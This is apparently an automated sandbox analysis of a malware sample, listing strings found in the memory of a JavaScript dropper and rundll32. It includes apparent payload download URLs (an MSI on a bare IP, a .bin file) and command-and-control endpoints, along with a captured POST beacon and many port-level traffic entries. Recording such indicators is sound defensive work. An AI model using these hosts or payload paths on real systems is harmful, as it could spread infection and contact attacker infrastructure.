HTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 252Cache-Control: no-cache

Source: rundll32.exe, 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000005.00000003.1681744394.00000235B5FA0000.00000040.00001000.00020000.00000000.sdmp, Update_cd47bedf.dll.5.dr, 360total.dll.1.dr	String found in binary or memory: ftp://ftp%2desktop.ini
Source: wscript.exe, 00000000.00000003.1722027817.0000023BEBD7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1632760730.0000023BEBE71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1723783765.0000023BEBD59000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1633247364.0000023BEC071000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634073325.0000023BEC085000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1632650735.0000023BEBEE5000.00000004.00000020.00020000.00000000.sdmp, Document_a51_19i793302-14b09981a5569-3684u8.js	String found in binary or memory: http://146.19.106.236/neo.msi
Source: ~DF41638D872A10A065.TMP.1.dr	String found in binary or memory: http://146.19.106.236/neo.msi-995103104311030230
Source: ~DFA850122BA55067CF.TMP.1.dr, ~DFF122760D5CC42A2E.TMP.1.dr, ~DFA3E2CC6CAB1B816A.TMP.1.dr, inprogressinstallinfo.ipi.1.dr, ~DF2C17C88212509880.TMP.1.dr, ~DF61773DAED613FFB9.TMP.1.dr	String found in binary or memory: http://146.19.106.236/neo.msi0
Source: wscript.exe, 00000000.00000002.1723806957.0000023BEBD70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.di
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: wscript.exe, 00000000.00000003.1634189374.0000023BEBD71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634223514.0000023BEC442000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: wscript.exe, 00000000.00000002.1724068170.0000023BEC4B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634189374.0000023BEBD71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1724068170.0000023BEC440000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: wscript.exe, 00000000.00000002.1724068170.0000023BEC4B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634189374.0000023BEBD71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: wscript.exe, 00000000.00000002.1723997016.0000023BEC072000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1721591141.0000023BEC071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesi
Source: wscript.exe, 00000000.00000002.1723806957.0000023BEBD70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digic
Source: wscript.exe, 00000000.00000003.1634189374.0000023BEBD71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634223514.0000023BEC442000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: wscript.exe, 00000000.00000002.1724068170.0000023BEC4B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634189374.0000023BEBD71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1724068170.0000023BEC440000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: wscript.exe, 00000000.00000002.1724068170.0000023BEC4B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634189374.0000023BEBD71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: wscript.exe, 00000000.00000003.1640046854.0000023BEC499000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1724068170.0000023BEC499000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000002.1724068170.0000023BEC468000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/ennu
Source: rundll32.exe	String found in binary or memory: http://dr.f.360.cn/scan
Source: rundll32.exe, 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000005.00000003.1681744394.00000235B5FA0000.00000040.00001000.00020000.00000000.sdmp, Update_cd47bedf.dll.5.dr, 360total.dll.1.dr	String found in binary or memory: http://dr.f.360.cn/scanlist
Source: wscript.exe, 00000000.00000002.1724068170.0000023BEC4B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634189374.0000023BEBD71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: wscript.exe, 00000000.00000003.1634189374.0000023BEBD71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634223514.0000023BEC442000.00000004.00000020.00020000.00000000.sdmp, MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: wscript.exe, 00000000.00000002.1724068170.0000023BEC4B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634189374.0000023BEBD71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1723806957.0000023BEBD70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1724068170.0000023BEC440000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: wscript.exe, 00000000.00000002.1723997016.0000023BEC072000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1721591141.0000023BEC071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/gsgccr4X)
Source: rundll32.exe	String found in binary or memory: http://pconf.f.360.cn/safe_update.php
Source: rundll32.exe	String found in binary or memory: http://pscan.f.360.cn/safe_update.php
Source: rundll32.exe, 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000005.00000003.1681744394.00000235B5FA0000.00000040.00001000.00020000.00000000.sdmp, Update_cd47bedf.dll.5.dr, 360total.dll.1.dr	String found in binary or memory: http://pscan.f.360.cn/safe_update.phphttp://pconf.f.360.cn/safe_update.phphttp://sconf.f.360.cn/clie
Source: rundll32.exe	String found in binary or memory: http://sconf.f.360.cn/client_security_conf
Source: wscript.exe, 00000000.00000002.1723997016.0000023BEC072000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1721591141.0000023BEC071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign
Source: wscript.exe, 00000000.00000002.1723997016.0000023BEC072000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1721591141.0000023BEC071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign)
Source: wscript.exe, 00000000.00000003.1640046854.0000023BEC4A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/;
Source: wscript.exe, 00000000.00000003.1639949100.0000023BEC4BB000.00000004.00000020.00020000.00000000.sdmp, C5C8CC0A7FE31816B4641D04654025600.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt
Source: wscript.exe, 00000000.00000002.1724068170.0000023BEC468000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0u
Source: wscript.exe, 00000000.00000003.1721307435.0000023BEBC71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1723783765.0000023BEBD59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crtY
Source: wscript.exe, 00000000.00000003.1640046854.0000023BEC499000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com:80/cacert/codesigningrootr45.crtdXl
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr	String found in binary or memory: http://t2.symcb.com0
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr	String found in binary or memory: http://tl.symcd.com0&
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: rundll32.exe, 00000006.00000003.6264187560.000001800FF27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6521086402.000001800FF27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6307126333.000001800FF28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.cH
Source: rundll32.exe, 00000006.00000003.4787698793.000001800E002000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/
Source: rundll32.exe, 00000006.00000003.2994803348.000001800E002000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4787698793.000001800E002000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/E0#W
Source: rundll32.exe, 00000006.00000003.5750316850.000001800FF2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/H
Source: rundll32.exe, 00000006.00000003.7266051394.000001800FF4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/Li
Source: rundll32.exe, 00000006.00000003.2994803348.000001800DFFF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/es
Source: rundll32.exe, 00000006.00000003.6264187560.000001800FF27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4787731986.000001800FF11000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5750950805.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5326914182.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6962568501.000001800FF27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4787698793.000001800E002000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/live/
Source: rundll32.exe, 00000006.00000003.4787731986.000001800FF11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/live/S
Source: rundll32.exe, 00000006.00000003.2983176378.0000018010110000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/live/URLS1https://pewwhranet.com/live/
Source: rundll32.exe, 00000006.00000003.6520846263.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4787698793.000001800E002000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/live/hy
Source: rundll32.exe, 00000006.00000003.6264187560.000001800FF27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/live/l
Source: rundll32.exe, 00000006.00000003.5750950805.000001800E003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/live/rW
Source: rundll32.exe, 00000006.00000003.6520846263.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5326914182.000001800E004000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/live/ras.com/live/
Source: rundll32.exe, 00000006.00000003.5750316850.000001800FF29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/w
Source: rundll32.exe, 00000006.00000003.2903428713.000001800DFFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2749690995.000001800E002000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2749690995.000001800DFFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2903428713.000001800E002000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2790535697.000001800E002000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2903527062.000001800DF8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/
Source: rundll32.exe, 00000006.00000003.2903527062.000001800DF8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/?
Source: rundll32.exe, 00000006.00000003.4787698793.000001800E002000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/files/stkm.bin
Source: rundll32.exe, 00000006.00000003.2903527062.000001800DF8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/
Source: rundll32.exe, 00000006.00000003.2903428713.000001800DFC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/(y
Source: rundll32.exe, 00000006.00000003.2903428713.000001800DFFF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/J$=W
Source: rundll32.exe, 00000006.00000003.2749690995.000001800E002000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/OIDV6SW/
Source: rundll32.exe, 00000006.00000003.2903527062.000001800DF8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/P
Source: rundll32.exe, 00000006.00000003.2749690995.000001800E002000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/dll
Source: rundll32.exe, 00000006.00000003.2790535697.000001800DFC9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2903428713.000001800DFC9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2749690995.000001800DFD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/l
Source: rundll32.exe, 00000006.00000003.2749690995.000001800E002000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2790535697.000001800E002000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/s6
Source: rundll32.exe, 00000006.00000003.7220266722.000001800FF4B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.7177265996.000001800FF4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pewwhranet.c
Source: rundll32.exe, 00000006.00000003.7220266722.000001800FF4B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5112685854.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.7266051394.000001800FF4B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5241324561.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.7177265996.000001800FF4C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4830897294.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6520846263.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4788197767.000001800DFFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5491239719.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5750950805.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5326914182.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6521086402.000001800FF27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.7263170002.000001800FF4B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4787698793.000001800E002000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pewwhranet.com/
Source: rundll32.exe, 00000006.00000003.7266051394.000001800FF4B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.7263170002.000001800FF4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pewwhranet.com/(h)W$
Source: rundll32.exe, 00000006.00000003.5965951373.000001800FF41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pewwhranet.com/4g9V
Source: rundll32.exe, 00000006.00000003.5112685854.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5241324561.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4830897294.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6520846263.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5491239719.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5750950805.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5326914182.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4787698793.000001800E002000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pewwhranet.com/=0
Source: rundll32.exe, 00000006.00000003.6962520365.000001800FF45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pewwhranet.com/Pb
Source: rundll32.exe, 00000006.00000003.6264187560.000001800FF27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6307126333.000001800FF28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pewwhranet.com/d
Source: rundll32.exe, 00000006.00000003.2983176378.0000018010110000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3042728036.0000018010070000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5112685854.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5241324561.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4830897294.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6520846263.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5491239719.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5750950805.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5326914182.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6521086402.000001800FF27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6307126333.000001800FF28000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4787698793.000001800E002000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pewwhranet.com/live/
Source: rundll32.exe, 00000006.00000003.6520846263.000001800E003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pewwhranet.com/live/My
Source: rundll32.exe, 00000006.00000003.6520846263.000001800E003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pewwhranet.com/live/ll
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr	String found in binary or memory: https://www.advancedinstaller.com
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: wscript.exe, 00000000.00000002.1723997016.0000023BEC072000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1721591141.0000023BEC071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repo
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr	String found in binary or memory: https://www.thawte.com/repository0W

Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
